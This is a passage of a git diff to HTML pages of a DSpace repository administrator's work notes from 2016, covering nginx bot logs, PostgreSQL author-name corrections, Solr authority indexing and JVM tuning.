    -       crawlerUserAgents=".*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*|.*Baiduspider.*" />
    +<Valve className="org.apache.catalina.valves.CrawlerSessionManagerValve"
    +       crawlerUserAgents=".*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*|.*Baiduspider.*" />
     
    • Looking at the bots that were active yesterday it seems the above regex should be sufficient:
    -
    $ grep -o -E 'Mozilla/5\.0 \(compatible;.*\"' /var/log/nginx/access.log | sort | uniq
    -Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-"
    -Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "-"
    -Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
    -Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "-"
    -Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)" "-"
    +
    $ grep -o -E 'Mozilla/5\.0 \(compatible;.*\"' /var/log/nginx/access.log | sort | uniq
    +Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-"
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "-"
    +Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
    +Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "-"
    +Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)" "-"
     
    • Neat maven trick to exclude some modules from being built:
    @@ -393,9 +393,9 @@ COPY 2515
  • Send a message to users of the CGSpace REST API to notify them of upcoming upgrade so they can test their apps against DSpace Test
  • Test an update old, non-HTTPS links to the CCAFS website in CGSpace metadata:
  • -
    dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org','https://ccafs.cgiar.org') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';
    +
    dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org','https://ccafs.cgiar.org') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';
     UPDATE 164
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org','https://ccafs.cgiar.org') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org','https://ccafs.cgiar.org') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';
     UPDATE 7
     
    • Had to run it twice to get all (not sure about “global” regex in PostgreSQL)
    • @@ -404,11 +404,11 @@ UPDATE 7
    • I’m debating forcing the re-generation of ALL thumbnails, since some come from DSpace 3 and 4 when the thumbnailing wasn’t as good
    • The results were very good, I think that after we upgrade to 5.5 I will do it, perhaps one community / collection at a time:
    -
    $ [dspace]/bin/dspace filter-media -f -i 10568/67156 -p "ImageMagick PDF Thumbnail"
    +
    $ [dspace]/bin/dspace filter-media -f -i 10568/67156 -p "ImageMagick PDF Thumbnail"
     
    • In related news, I’m looking at thumbnails of thumbnails (the ones we uploaded manually before, and now DSpace’s media filter has made thumbnails of THEM):
    -
    dspace=# select text_value from metadatavalue where text_value like '%.jpg.jpg';
    +
    dspace=# select text_value from metadatavalue where text_value like '%.jpg.jpg';
     
    • I’m not sure if there’s anything we can do, actually, because we would have to remove those from the thumbnail bundles, and replace them with the regular JPGs from the content bundle, and then remove them from the assetstore…
    @@ -464,7 +464,7 @@ UPDATE 7
  • One user says they are still getting a blank page when he logs in (just CGSpace header, but no community list)
  • Looking at the Catlina logs I see there is some super long-running indexing process going on:
  • -
    INFO: FrameworkServlet 'oai': initialization completed in 2600 ms
    +
    INFO: FrameworkServlet 'oai': initialization completed in 2600 ms
     [>                                                  ] 0% time remaining: Calculating... timestamp: 2016-11-28 03:00:18
     [>                                                  ] 0% time remaining: 11 hour(s) 57 minute(s) 46 seconds. timestamp: 2016-11-28 03:00:19
     [>                                                  ] 0% time remaining: 23 hour(s) 4 minute(s) 28 seconds. timestamp: 2016-11-28 03:00:19
    @@ -497,7 +497,7 @@ $ /home/dspacetest.cgiar.org/bin/dspace registry-loader -metadata /home/dspacete
     2016-11-29 07:56:36,545 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Start processing item 10568/50391 id:51744
     2016-11-29 07:56:36,545 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Processing item stats
     2016-11-29 07:56:36,583 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Solr metadata up-to-date
    -2016-11-29 07:56:36,583 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Processing item's bitstream stats
    +2016-11-29 07:56:36,583 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Processing item's bitstream stats
     2016-11-29 07:56:36,608 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Solr metadata up-to-date
     2016-11-29 07:56:36,701 INFO  org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ facets for scope, null: 23
     2016-11-29 07:56:36,747 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
    diff --git a/docs/2016-12/index.html b/docs/2016-12/index.html
    index 66713f242..f68cfbdf2 100644
    --- a/docs/2016-12/index.html
    +++ b/docs/2016-12/index.html
    @@ -12,11 +12,11 @@
     CGSpace was down for five hours in the morning while I was sleeping
     While looking in the logs for errors, I see tons of warnings about Atmire MQM:
     
    -2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
     
     I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
     I’ve raised a ticket with Atmire to ask
    @@ -36,17 +36,17 @@ Another worrying error from dspace.log is:
     CGSpace was down for five hours in the morning while I was sleeping
     While looking in the logs for errors, I see tons of warnings about Atmire MQM:
     
    -2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
     
     I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
     I’ve raised a ticket with Atmire to ask
     Another worrying error from dspace.log is:
     "/>
    -
    +
     
     
         
    @@ -137,11 +137,11 @@ Another worrying error from dspace.log is:
     
  • CGSpace was down for five hours in the morning while I was sleeping
  • While looking in the logs for errors, I see tons of warnings about Atmire MQM:
  • -
    2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
    +
    2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
     
    • I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
    • I’ve raised a ticket with Atmire to ask
    • @@ -236,13 +236,13 @@ Caused by: java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceOb
    • The first error I see in dspace.log this morning is:
    -
    2016-12-02 03:00:46,656 ERROR org.dspace.authority.AuthorityValueFinder @ anonymous::Error while retrieving AuthorityValue from solr:query\colon; id\colon;"b0b541c1-ec15-48bf-9209-6dbe8e338cdc"
    +
    2016-12-02 03:00:46,656 ERROR org.dspace.authority.AuthorityValueFinder @ anonymous::Error while retrieving AuthorityValue from solr:query\colon; id\colon;"b0b541c1-ec15-48bf-9209-6dbe8e338cdc"
     org.apache.solr.client.solrj.SolrServerException: Server refused connection at: http://localhost:8081/solr/authority
     
    • Looking through DSpace’s solr log I see that about 20 seconds before this, there were a few 30+ KiB solr queries
    • The last logs here right before Solr became unresponsive (and right after I restarted it five hours later) were:
    -
    2016-12-02 03:00:42,606 INFO  org.apache.solr.core.SolrCore @ [statistics] webapp=/solr path=/select params={q=containerItem:72828+AND+type:0&shards=localhost:8081/solr/statistics-2010,localhost:8081/solr/statistics&fq=-isInternal:true&fq=-(author_mtdt:"CGIAR\+Institutional\+Learning\+and\+Change\+Initiative"++AND+subject_mtdt:"PARTNERSHIPS"+AND+subject_mtdt:"RESEARCH"+AND+subject_mtdt:"AGRICULTURE"+AND+subject_mtdt:"DEVELOPMENT"++AND+iso_mtdt:"en"+)&rows=0&wt=javabin&version=2} hits=0 status=0 QTime=19
    +
    2016-12-02 03:00:42,606 INFO  org.apache.solr.core.SolrCore @ [statistics] webapp=/solr path=/select params={q=containerItem:72828+AND+type:0&shards=localhost:8081/solr/statistics-2010,localhost:8081/solr/statistics&fq=-isInternal:true&fq=-(author_mtdt:"CGIAR\+Institutional\+Learning\+and\+Change\+Initiative"++AND+subject_mtdt:"PARTNERSHIPS"+AND+subject_mtdt:"RESEARCH"+AND+subject_mtdt:"AGRICULTURE"+AND+subject_mtdt:"DEVELOPMENT"++AND+iso_mtdt:"en"+)&rows=0&wt=javabin&version=2} hits=0 status=0 QTime=19
     2016-12-02 08:28:23,908 INFO  org.apache.solr.servlet.SolrDispatchFilter @ SolrDispatchFilter.init()
     
    • DSpace’s own Solr logs don’t give IP addresses, so I will have to enable Nginx’s logging of /solr so I can see where this request came from
    • @@ -279,7 +279,7 @@ Result = The bitstream could not be found
    • In other news, I’m looking at JVM settings from the Solr 4.10.2 release, from bin/solr.in.sh:
    # These GC settings have shown to work well for a number of common Solr workloads
    -GC_TUNE="-XX:-UseSuperWord \
    +GC_TUNE="-XX:-UseSuperWord \
     -XX:NewRatio=3 \
     -XX:SurvivorRatio=4 \
     -XX:TargetSurvivorRatio=90 \
    @@ -296,7 +296,7 @@ GC_TUNE="-XX:-UseSuperWord \
     -XX:CMSMaxAbortablePrecleanTime=6000 \
     -XX:+CMSParallelRemarkEnabled \
     -XX:+ParallelRefProcEnabled \
    --XX:+AggressiveOpts"
    +-XX:+AggressiveOpts"
     
    • I need to try these because they are recommended by the Solr project itself
    • Also, as always, I need to read Shawn Heisey’s wiki page on Solr
    • @@ -319,17 +319,17 @@ GC_TUNE="-XX:-UseSuperWord \
      • Some author authority corrections and name standardizations for Peter:
      -
      dspace=# update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
      +
      dspace=# update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
       UPDATE 11
      -dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
      +dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
       UPDATE 36
      -dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
      +dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
       UPDATE 14
      -dspace=# update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
      +dspace=# update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
       UPDATE 42
      -dspace=# update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
      +dspace=# update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
       UPDATE 360
      -dspace=# update metadatavalue set text_value='Grace, Delia', authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
      +dspace=# update metadatavalue set text_value='Grace, Delia', authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
       UPDATE 561
       
      • Pay attention to the regex to prevent false positives in tricky cases with Dutch names!
      • @@ -343,7 +343,7 @@ UPDATE 561
      • The docs say a good starting point for a dedicated server is 25% of the system RAM, and our server isn’t dedicated (also runs Solr, which can benefit from OS cache) so let’s try 1024MB
      • In other news, the authority reindexing keeps crashing (I was manually running it after the author updates above):
      -
      $ time JAVA_OPTS="-Xms768m -Xmx768m -Dfile.encoding=UTF-8" /home/dspacetest.cgiar.org/bin/dspace index-authority
      +
      $ time JAVA_OPTS="-Xms768m -Xmx768m -Dfile.encoding=UTF-8" /home/dspacetest.cgiar.org/bin/dspace index-authority
       Retrieving all data
       Initialize org.dspace.authority.indexer.DSpaceAuthorityIndexer
       Exception: null
      @@ -377,30 +377,30 @@ sys     0m22.647s
       
    • Querying that ID shows the fields that need to be changed:
    {
    -  "responseHeader": {
    -    "status": 0,
    -    "QTime": 1,
    -    "params": {
    -      "q": "id:0b4fcbc1-d930-4319-9b4d-ea1553cca70b",
    -      "indent": "true",
    -      "wt": "json",
    -      "_": "1481102189244"
    +  "responseHeader": {
    +    "status": 0,
    +    "QTime": 1,
    +    "params": {
    +      "q": "id:0b4fcbc1-d930-4319-9b4d-ea1553cca70b",
    +      "indent": "true",
    +      "wt": "json",
    +      "_": "1481102189244"
         }
       },
    -  "response": {
    -    "numFound": 1,
    -    "start": 0,
    -    "docs": [
    +  "response": {
    +    "numFound": 1,
    +    "start": 0,
    +    "docs": [
           {
    -        "id": "0b4fcbc1-d930-4319-9b4d-ea1553cca70b",
    -        "field": "dc_contributor_author",
    -        "value": "Grace, D.",
    -        "deleted": false,
    -        "creation_date": "2016-11-10T15:13:40.318Z",
    -        "last_modified_date": "2016-11-10T15:13:40.318Z",
    -        "authority_type": "person",
    -        "first_name": "D.",
    -        "last_name": "Grace"
    +        "id": "0b4fcbc1-d930-4319-9b4d-ea1553cca70b",
    +        "field": "dc_contributor_author",
    +        "value": "Grace, D.",
    +        "deleted": false,
    +        "creation_date": "2016-11-10T15:13:40.318Z",
    +        "last_modified_date": "2016-11-10T15:13:40.318Z",
    +        "authority_type": "person",
    +        "first_name": "D.",
    +        "last_name": "Grace"
           }
         ]
       }
    @@ -409,51 +409,51 @@ sys     0m22.647s
     
  • I think I can just update the value, first_name, and last_name fields…
  • The update syntax should be something like this, but I’m getting errors from Solr:
  • -
    $ curl 'localhost:8081/solr/authority/update?commit=true&wt=json&indent=true' -H 'Content-type:application/json' -d '[{"id":"1","price":{"set":100}}]'
    +
    $ curl 'localhost:8081/solr/authority/update?commit=true&wt=json&indent=true' -H 'Content-type:application/json' -d '[{"id":"1","price":{"set":100}}]'
     {
    -  "responseHeader":{
    -    "status":400,
    -    "QTime":0},
    -  "error":{
    -    "msg":"Unexpected character '[' (code 91) in prolog; expected '<'\n at [row,col {unknown-source}]: [1,1]",
    -    "code":400}}
    +  "responseHeader":{
    +    "status":400,
    +    "QTime":0},
    +  "error":{
    +    "msg":"Unexpected character '[' (code 91) in prolog; expected '<'\n at [row,col {unknown-source}]: [1,1]",
    +    "code":400}}
     
    • When I try using the XML format I get an error that the updateLog needs to be configured for that core
    • Maybe I can just remove the authority UUID from the records, run the indexing again so it creates a new one for each name variant, then match them correctly?
    -
    dspace=# update metadatavalue set authority=null, confidence=-1 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
    +
    dspace=# update metadatavalue set authority=null, confidence=-1 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
     UPDATE 561
     
    • Then I’ll reindex discovery and authority and see how the authority Solr core looks
    • After this, now there are authorities for some of the “Grace, D.” and “Grace, Delia” text_values in the database (the first version is actually the same authority that already exists in the core, so it was just added back to some text_values, but the second one is new):
    -
    $ curl 'localhost:8081/solr/authority/select?q=id%3A18ea1525-2513-430a-8817-a834cd733fbc&wt=json&indent=true'
    +
    $ curl 'localhost:8081/solr/authority/select?q=id%3A18ea1525-2513-430a-8817-a834cd733fbc&wt=json&indent=true'
     {
    -  "responseHeader":{
    -    "status":0,
    -    "QTime":0,
    -    "params":{
    -      "q":"id:18ea1525-2513-430a-8817-a834cd733fbc",
    -      "indent":"true",
    -      "wt":"json"}},
    -  "response":{"numFound":1,"start":0,"docs":[
    +  "responseHeader":{
    +    "status":0,
    +    "QTime":0,
    +    "params":{
    +      "q":"id:18ea1525-2513-430a-8817-a834cd733fbc",
    +      "indent":"true",
    +      "wt":"json"}},
    +  "response":{"numFound":1,"start":0,"docs":[
           {
    -        "id":"18ea1525-2513-430a-8817-a834cd733fbc",
    -        "field":"dc_contributor_author",
    -        "value":"Grace, Delia",
    -        "deleted":false,
    -        "creation_date":"2016-12-07T10:54:34.356Z",
    -        "last_modified_date":"2016-12-07T10:54:34.356Z",
    -        "authority_type":"person",
    -        "first_name":"Delia",
    -        "last_name":"Grace"}]
    +        "id":"18ea1525-2513-430a-8817-a834cd733fbc",
    +        "field":"dc_contributor_author",
    +        "value":"Grace, Delia",
    +        "deleted":false,
    +        "creation_date":"2016-12-07T10:54:34.356Z",
    +        "last_modified_date":"2016-12-07T10:54:34.356Z",
    +        "authority_type":"person",
    +        "first_name":"Delia",
    +        "last_name":"Grace"}]
       }}
     
    • So now I could set them all to this ID and the name would be ok, but there has to be a better way!
    • In this case it seems that since there were also two different IDs in the original database, I just picked the wrong one!
    • Better to use:
    -
    dspace#= update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
    +
    dspace#= update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
     
    • This proves that unifying author name varieties in authorities is easy, but fixing the name in the authority is tricky!
    • Perhaps another way is to just add our own UUID to the authority field for the text_value we like, then re-index authority so they get synced from PostgreSQL to Solr, then set the other text_values to use that authority ID
    • @@ -461,17 +461,17 @@ UPDATE 561
    • Deploy “take task” hack/fix on CGSpace (#290)
    • I ran the following author corrections and then reindexed discovery:
    -
